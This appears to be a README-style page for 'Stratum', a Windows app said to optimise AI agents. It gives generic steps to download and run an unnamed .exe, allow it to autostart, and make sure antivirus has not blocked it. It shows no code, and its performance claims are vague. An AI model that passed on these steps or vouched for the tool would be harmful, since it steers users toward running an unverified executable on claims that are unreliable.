Stratum is a tool that helps AI agents work better by adjusting themselves automatically. It acts as a smart layer that improves how AI systems run. If you use AI tools or want your AI programs to perform well without constant manual tweaks, Stratum can help.
This app works on Windows and doesn't require any programming knowledge to use. It runs in the background and makes AI agents faster and more stable.
Key points about Stratum:
- Improves the performance of AI agents.
- Works automatically, no need for user input.
- Supports popular AI tools and frameworks.
- Uses smart methods to manage system resources.
Before you start, make sure your PC meets these requirements:
- Operating System: Windows 10 or later (64-bit)
- RAM: 8 GB minimum (16 GB recommended)
- Disk Space: At least 500 MB free
- Processor: Intel i5 or equivalent
- Internet connection to download and update
You don't need to install any extra software or tools to run Stratum.
To get Stratum on your Windows PC, follow these steps:
- Click the big Download Stratum button at the top or go to the release page.
- On the release page, find the latest version. It usually appears at the top.
- Look for a Windows installer file. It should end with
.exe. - Click the
.exefile to start downloading.
Keep in mind that the release page lists all versions. Always use the latest one with the highest version number.
Once you have downloaded the installer file, follow these instructions:
- Locate the downloaded file in your "Downloads" folder or where your browser saves files.
- Double-click the
.exefile to launch the installer. - If Windows asks for permission, click Yes to allow the installer to run.
- The setup window will appear. Click Next to begin.
- Read the license agreement. If you agree, select I accept the terms and click Next.
- Choose the folder where you want to install Stratum or leave it at the default path, then click Next.
- Click Install to start the installation.
- Wait for the progress bar to finish.
- When the installation finishes, click Finish to close the installer.
Stratum is now installed on your computer.
To start Stratum:
- Click the Windows Start button.
- Scroll through the list of apps until you find Stratum.
- Click Stratum to launch the app.
Once running, Stratum works on its own. You do not need to open it every time you use your AI agents. It will automatically adjust settings to keep your AI tools running smoothly.
You can check that Stratum is working by finding its icon in the system tray, near the clock on your taskbar. Hover your mouse over it to see the status.
If you need to stop Stratum:
- Right-click the Stratum icon in the system tray.
- Select Exit or Quit.
Stratum will close and stop optimizing.
Stratum has some options you can adjust if you want more control:
- Performance Level: Choose how much Stratum should optimize your AI tools. Options include Low, Medium, and High.
- Auto Start: Turn on or off the option to start Stratum automatically when Windows boots.
- Logs: View and save system activity reports to help troubleshoot.
You can access these settings by opening Stratum from the Start menu and clicking the gear or settings icon inside the app window.
If Stratum does not seem to work or you have issues, try these solutions:
- Make sure your Windows is updated.
- Restart your computer after installation.
- Disable other system optimization software that might conflict.
- Check that your antivirus did not block Stratum.
- Run the installer again to repair the installation.
If problems persist, visit the release page for known issues or updates.
If you need to download or update Stratum, use this link:
Click this to visit the page. Select the latest .exe file under Releases and follow the installation steps again.
Stratum was built to simplify managing AI agents. It uses knowledge graphs, memory systems, and open source frameworks like Python and Rust to improve AI's efficiency. The app makes AI tools run better without user effort.
If you want the technical details or want to contribute, visit the full project on GitHub. This page is focused on easy use, but the code supports advanced features inside.
Topics: agent-framework, ai-agent, infrastructure, knowledge-graph, llm, openclaw, persistent-memory, python, rust, self-optimization